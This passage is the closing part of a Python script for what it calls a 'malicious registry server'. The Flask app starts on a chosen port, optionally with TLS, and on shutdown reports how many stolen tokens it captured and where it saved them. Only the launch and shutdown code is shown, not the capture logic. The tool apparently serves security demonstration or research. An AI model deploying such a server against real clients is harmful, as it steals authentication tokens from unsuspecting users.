    print(f" {Colors.GREEN}🚀 Malicious registry server is now running!{Colors.RESET}")
    print(f" {Colors.GREEN}📡 Listening on: {protocol}://0.0.0.0:{config.port}{Colors.RESET}")
    print(f" {Colors.DIM}Press Ctrl+C to stop{Colors.RESET}")
    print(f"\n{'═' * 77}\n")
    # Disable Flask's default logging for cleaner output
    log = logging.getLogger('werkzeug')
    log.setLevel(logging.ERROR)
    # Suppress Flask startup message
    cli = sys.modules.get('flask.cli')
    if cli:
        # Parameter named to avoid shadowing the parsed ``args`` above.
        cli.show_server_banner = lambda *_banner_args: None
    try:
        if use_ssl and cert_path and key_path:
            # Run with HTTPS
            context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
            context.load_cert_chain(cert_path, key_path)
            app.run(host='0.0.0.0', port=config.port, debug=False, threaded=True, ssl_context=context)
        else:
            # Run with HTTP
            app.run(host='0.0.0.0', port=config.port, debug=False, threaded=True)
    except KeyboardInterrupt:
        print(f"\n\n{Colors.YELLOW}[!] Server shutting down...{Colors.RESET}")
        print(f"{Colors.GREEN}[✓] Total tokens captured: {len(stolen_tokens)}{Colors.RESET}")
        if stolen_tokens:
            print(f"{Colors.GREEN}[✓] Tokens saved to: {config.log_file}{Colors.RESET}")
        print(f"{Colors.DIM}Goodbye!{Colors.RESET}\n")
# Start the server only when this file is executed as a script, not on import.
if __name__ == '__main__':
    main()